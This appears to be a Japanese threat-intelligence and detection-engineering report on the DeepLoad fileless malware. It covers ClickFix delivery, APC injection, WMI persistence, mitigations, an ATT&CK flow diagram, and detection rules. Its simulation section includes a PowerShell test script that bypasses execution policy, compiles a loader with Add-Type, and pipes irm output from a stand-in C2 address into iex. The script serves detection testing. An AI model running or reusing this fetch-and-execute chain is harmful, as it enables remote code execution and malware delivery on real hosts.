フォローする 
概要
DeepLoadはClickFixソーシャルエンジニアリングを通じて配布されるファイルレスのマルウェアファミリーです。難読化されたPowerShellローダー、信頼されたWindowsプロセスへのメモリ内シェルコード注入、静的検出の精度を低下させるためのAI生成の「ノイズ」を利用しています。ローダーはスケジュールされたタスクとWMIイベントのサブスクリプションを使用して持続性を確立し、USBメディアを介して拡散し、不正なブラウザ拡張機能とコンパニオンfilemanager.exeコンポーネントを通じて資格情報を盗みます。
調査
この報告書は、被害者が実行したPowerShellコマンドから始まる初期アクセスと、mshta.exeを通じてローダーが取得される過程を説明しています。ローダーはAdd-Typeを使用して実行時に一時的なDLLを生成し、APCベースの注入を用いてLockAppHost.exeにシェルコードを注入します。持続性はスケジュールされたタスクと、削除後にも感染を再確立できる隠されたWMIイベントサブスクリプションを通じて維持され、約3日の遅延ウィンドウがあることが確認されています。資格情報の盗難は、filemanager.exeと並行して動作する悪意のあるブラウザ拡張機能によるものとされます。
緩和策
有効化する PowerShellスクリプトブロックのロギング と、疑わしいPowerShell実行チェーンにアラートを設定します。mshta.exeのアウトバウンドネットワーク活動を監査し、予期しないスケジュールタスク作成を監視し、APC注入を示唆する異常なQueueUserAPCの使用を検出します。リメディエーションの際には、ファイル/レジストリのクリーンアップに頼らず、WMIイベントサブスクリプションを明示的に列挙して削除してください。露出した資格情報をローテーションし、資格情報収集経路を断ち切るために不正なブラウザ拡張機能を削除します。
対応
DeepLoad活動が検出された場合、ホストを隔離し、悪意のあるPowerShell活動を停止し、注入されたプロセスを終了します。スケジュールされたタスクを削除し、関連するWMIサブスクリプションを削除し、filemanager.exeと悪意のあるブラウザ拡張機能を除去します。潜在的に危険にさらされたすべての資格情報をローテーションし、接続されたUSBメディアを消毒し、システムに残留した注入アーティファクトがないことを検証してからサービスに戻します。
キーワード: DeepLoad, ClickFix, ファイルレスマルウェア, PowerShellローダー, mshta.exe, Add-Type, メモリ内シェルコード, APC注入, QueueUserAPC, LockAppHost.exe, スケジュールされたタスクの持続性, WMIイベントサブスクリプション, USB拡散, 不正ブラウザ拡張機能, 資格情報の盗難。
"graph TB %% Class definitions classDef action fill:#99ccff %% Node definitions step_user_exec["<b>アクション</b> – <b>T1204.004 ユーザー実行: 悪意のあるコピー&ペースト</b><br/>被害者がClickFix経由でPowerShellコマンドを実行します。"] class step_user_exec action step_powershell["<b>アクション</b> – <b>T1059.001 コマンド及びスクリプティングインタプリタ: PowerShell</b><br/>Invokeu2011Expression (IEX)を使用してローダーをダウンロードします。"] class step_powershell action step_mshta["<b>アクション</b> – <b>T1218.005 システムバイナリプロキシ実行: Mshta</b><br/>mshta.exeがリモートスクリプトを取得します。"] class step_mshta action step_schtask["<b>アクション</b> – <b>T1053 スケジュールされたタスク/ジョブ</b><br/>ローダーを再実行するための持続タスクを作成します。"] class step_schtask action step_injection["<b>アクション</b> – <b>T1055.004 プロセス注入: 非同期プロシージャコール</b><br/>LockAppHost.exeにシェルコードを注入します。"] class step_injection action step_reflective["<b>アクション</b> – <b>T1620 反射コード読み込み</b><br/>Add-Typeを介してメモリ内DLLをコンパイルします。"] class step_reflective action step_masquerade["<b>アクション</b> – <b>T1036.003 偽装: 正当なユーティリティの名称変更</b><br/>filemanager.exeと.lnkショートカットを使用します。"] class step_masquerade action step_removable["<b>アクション</b> – <b>T1091 可搬メディアを介した拡散 / T1080 共有コンテンツの汚染</b><br/>悪意のあるショートカットをUSBドライブに落とします。"] class step_removable action step_wmi["<b>アクション</b> – <b>T1546.003 イベントトリガー実行: WMIイベントサブスクリプション</b><br/>クリーンアップ後に持続および再実行します。"] class step_wmi action step_keylog["<b>アクション</b> – <b>T1056.001 入力キャプチャ: キーロギング</b><br/>資格情報のためにキーストロークをキャプチャします。"] class step_keylog action step_cred["<b>アクション</b> – <b>T1555.003 ウェブブラウザから資格情報 / T1176 ソフトウェア拡張機能</b><br/>悪意のあるブラウザ拡張機能が保存されたパスワードを盗みます。"] class step_cred action step_valid["<b>アクション</b> – <b>T1078 有効なアカウント</b><br/>攻撃者が収穫された資格情報を使用します。"] class step_valid action step_c2["<b>アクション</b> – <b>T1102.002 双方向ウェブサービス通信 / T1102.003 一方通行</b><br/>C2チャネルとデータ流出を行います。"] class step_c2 action %% Connections step_user_exec –>|triggers| step_powershell step_powershell –>|downloads via| step_mshta step_mshta –>|executes| step_schtask step_schtask –>|creates| step_injection step_injection –>|injects into| step_reflective step_reflective –>|loads| step_masquerade step_masquerade –>|places shortcuts on| step_removable step_removable –>|enables| step_wmi step_wmi –>|activates| step_keylog step_keylog –>|captures credentials for| step_cred step_cred –>|provides| step_valid step_valid –>|facilitates| step_c2 "
攻撃フロー
検出
疑わしいコマンドコントロールによる異常なトップレベルドメイン (TLD) DNSリクエスト (via dns)
表示
PowerShellから疑わしいWindows API関数の呼び出し (via powershell)
表示
PowerShellによるダウンロードまたはアップロード (via cmdline)
表示
異常なポートを使用したHTTPへの直接IPでの可能なC2通信 (via proxy)
表示
DeepLoadマルウェア検出:mshta.exeの濫用とAPC注入を介した [Windowsプロセス生成]
表示
PowerShellバイパスとAdd-Typeを使用したDeepLoadマルウェアの検出 [Windows PowerShell]
表示
シミュレーション実行
前提条件: テレメトリ&ベースライン事前フライトチェックが合格している必要があります。
根拠: このセクションは、検出ルールをトリガーするために設計された敵の技術(TTP)の正確な実行を詳細に説明します。コマンドと記述は、識別されたTTPを直接反映し、検出ロジックが予期する正確なテレメトリを生成することを目的としています。抽象的または無関係な例は誤診につながる可能性があります。
-
攻撃シナリオとコマンド:
- 初期の足場: 攻撃者は被害者ホスト上で低特権のPowerShellセッションを持っています。
- 実行ポリシーをバイパス: 彼らはPowerShellを
-ep Bypassで呼び出し、スクリプト実行の制限を無視します。 - .NETペイロードのコンパイル: 使用
Add-Typeで、インスタンス化されたときにC2サーバーに対してウェブリクエストを行う小さなC#クラスを埋め込みます (http://10.0.0.5:3015/index). - リモートスクリプトのダウンロードと実行: 攻撃者は
irm(Invoke‑RestMethod) をiexにパイプして、メモリ内で悪意のあるスクリプトを実行します。 - 生成されたテレメトリ: OSによって記録されたコマンドラインには、必要な3つの文字列 (
-ep Bypass,Add-Type,iex(irm http://…:3015/index)) が含まれており、Sigmaルールを満たしています。
-
リグレッションテストスクリプト:
# DeepLoad風の悪意のある実行 # このスクリプトはSigmaルールをトリガーするために必要な正確なコマンドパターンを再現します。 $c2 = "http://10.0.0.5:3015/index" $payload = @" using System; using System.Net; public class Loader { public static void Run() { new WebClient().DownloadString(""$c2""); } } "@ # Bypassフラグを使用してPowerShellを呼び出し、ペイロードをコンパイルし、リモートスクリプトを実行します powershell -NoProfile -ExecutionPolicy Bypass -Command ` "Add-Type -TypeDefinition `$payload; ` iex (irm $c2)" -
クリーンアップコマンド:
# 一時ファイルやロードされたアセンブリを削除します(保存されている場合) Remove-Item -Path "$env:TEMPloader.dll" -ErrorAction SilentlyContinue # オプションで、PowerShellトランスクリプトをクリアします(有効化されている場合) Clear-Host
報告書の終わり